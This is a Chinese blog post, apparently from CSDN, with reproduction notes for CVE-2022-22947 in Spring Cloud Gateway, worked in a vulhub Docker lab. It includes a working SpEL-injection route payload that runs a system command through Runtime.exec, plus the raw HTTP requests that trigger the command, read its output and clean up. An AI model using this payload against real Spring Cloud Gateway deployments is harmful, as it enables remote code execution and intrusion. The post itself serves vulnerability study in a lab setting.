漏洞复现笔记(CVE-2022-22947)

最新推荐文章于 2024-07-16 20:38:37 发布
最新推荐文章于 2024-07-16 20:38:37 发布
阅读量165 收藏 3
点赞数 10
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72760965/article/details/139680442
版权

漏洞描述

2022年3月1日,VMware官方发布漏洞报告,在使用Spring Colud Gateway的应用程序开启、暴露Gateway Actuator端点时,会容易造成代码注入攻击,攻击者可以制造恶意请求,在远程主机进行任意远程执行

影响版本

Spring Cloud Gateway 3.1.x< 3.1.1
Spring Cloud Gateway 3.0.x < 3.0.7
旧的、不受支持的版本也会受到影响

漏洞原理

Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令

环境搭建

  • 进入靶场

  • cd vulhub/spring/CVE-2022-22947

  • 开启靶场

  • docker-compose up -d

  • 查看靶场信息

  • docker ps

  • 访问网址

  • http://youip:8080

漏洞复现

抓包
以POST方法请求 /actuator/gateway/routes/hacktest,将Content-Type: application/x-www-form-urlencoded改为Content-Type: application/json,并提交以下数据,用于创建一条恶意路由:
{ "id": "1_Rytest", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}" } }], "uri": "http://example.com" }

然后应用刚添加的路由发送如下数据包,此数据包会触发表达式执行:
POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.198.129:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0

发送如下数据包可查看结果:

GET /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.198.129:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0

最后发送如下数据包进行清理,删除所添加的路由:

DELETE /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.198.129:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close

再次刷新路由

POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.198.129:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0

最后关闭镜像

  • docker-compose down
纪瑾
关注
  • 10
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修方案 1.建议升级到安全版本,参考官网链接: ...
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
防御笔记第七天(时需更新)
weixin_63264424的博客
07-16 498
HRP在进行双机热备时,还有一个要求,两台热设备之间,必须拥有一条链路,用来同步信息,并且,这条链路必须是三层链路---这两条路在进行数据传输时,不受安全策略的影响,(注意,如果心跳线是直连的,则不受安全策略的影响,但是中间有中继设备,即非直连场景,则需要配置安全策略)----心跳线----VGMP发送的报文也是通过心跳线传输的。配置信息---(接口IP地址,路由地址)-----hrp不能同步基本的接口和路由信息,安全策略和NAT策略……状态信息-----会话表,server-map,黑名单和白名单等等。
微信小程序开发笔记之”表单读不出数据“解决指南
qq_46396470的博客
07-12 329
脑瓜子好了后,忘记了表单控件必须要加上。提交后打印的字典是空的,卡了十几分钟。
mysql笔记1
m0_62975692的博客
07-11 403
首先查看systemctl status mysqld,如果是关闭的可以进入的配置文件打开mysql,我的mysql配置文件就是在/usr/local/mysql/support-filess/下,在此目录下执行./mysql.server start,打开mysql服务,也可以通过systmectl start mysqld,如果你嫌麻烦的话可以systemctl enable mysqld 一直打开mysql的服务;重新给字段添加约束的时候不可以添加not null约束的!
算法刷题笔记 KMP字符串(C++实,并给出了求next数组的独家简单理解方式)
hanmo22357的博客
07-12 828
一道经典且较难的算法题,给出了C++代码实,以及自己对next数组求解的独家简单的理解方式。
计算机网络笔记【面向考纲整理】
07-13 375
计算机网络(简称网络)由若干结点(node,节点)和连接这些结点的链路(link)组成。
java Web学习笔记(三)
qq_62678419的博客
07-12 1055
java 前端工程框架 vue3 包括以下依赖的学习 vite npm router axios
linux学习笔记整理: 关于linux系统介绍 2024/7/16;
最新发布
gzx233的博客
07-16 752
linux基础介绍和指令
AGV栅格地图与QImage图片转换笔记
Pou光明的博客
07-15 261
最近在加班加点处理一个agv相关的任务,印象比较深的是将agv给的json数据转换为一个图片。最终的简化需求是将某坐标系下的二维点数据转换为一张图片的像素。Ok,首先的问题是如何将二维的数据映射到栅格坐标系。先看数据例子:"mapType":"2D-Map","maxPos":{"x":4.51,"y":16.331},"minPos":{"x":-14.138,"y":-1.48} "resol...
OpenGL笔记十一之Uniform变量及实一个颜色忽明忽暗的三角形
小勇博客
07-14 328
— 2024-07-14 上午。
STM32学习和实践笔记(40):DS18B20温度传感器实验
qq_37191547的博客
07-15 110
DS18B20温度传感器的内部存储器包括一个高速的暂存器RAM和一个非易失性的可电擦除的EEPROM,后者存放高温度和低温度触发器TH、TL和配置寄存器。60~240 us,以产生低电平应答脉冲。单总线器件仅在主机发出读时序时,才向主机传输数据,所以,在主机发出读数据命令后,必须马上产生读时序,以便从机能够传输数据。比如我们要计算+85度,数据输出十六进制是0X0550,因为高字节的高5位为0,表明检测的温度是正温度,接着主机释放总线,外部的上拉电阻将单总线拉高,延时 15~60 us,并进入接收模式。
c++树笔记
weixin_70468627的博客
07-16 669
树(Tree)是n(n≥0)个结点的有限集。n=0时称为空树。在任意一颗非空树中:①有且仅有一个特定的称为根(Root)的结点;②当n>1时,其余结点可分为m(m>0)个互不相交的有限集T 1 {T}_{1}T 1 ​ 、T 2 {T}_{2}T 2 ​ 、… 、T m {T}_{m}T m ​ ,其中每一个集合本身又是一棵树,并且称为根的子树(Sub Tree)。
Cadence23学习笔记(三)
zjb6668的博客
07-15 308
焊接FPC的时候先上锡,焊台加热后再图上焊油,再放置元器件,再加热:万用表测电流只需要把表笔接到电流的孔位即可测量电流,不需要接再串联一个负载:有些线性电源两个通道可以串联,并联起来使用;
Linux笔记之shell终端命令后显示指定行数的grep和head
小勇博客
07-14 521
在Linux中,grep命令和head命令常用于文本处理。grep命令用于搜索文本中的特定模式,而head命令用于显示文件的开头部分。了解如何结合这两个命令(例如使用管道)可以帮助你更高效地处理和查看文本数据。grep -A选项用于在匹配到的行之后显示指定数量的行。例如,将显示匹配到的行及其后面的三行。选项用于显示文件的前n行。例如,将显示file.txt的前五行。
Redis学习笔记(个人向)
ozawacai的博客
07-12 646
从个人使用角度总结了我对Redis的理解
vulhubCVE-2022-22947
10-13
CVE-2022-22947漏洞,需要先在vulhub上搭建一个运行着vBulletin 5.6.4版本的环境。然后,通过发送特制的HTTP请求,即可触发漏洞,导致远程代码执行。 具体步骤如下: 1. 在vulhub上下载并启动vBulletin ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值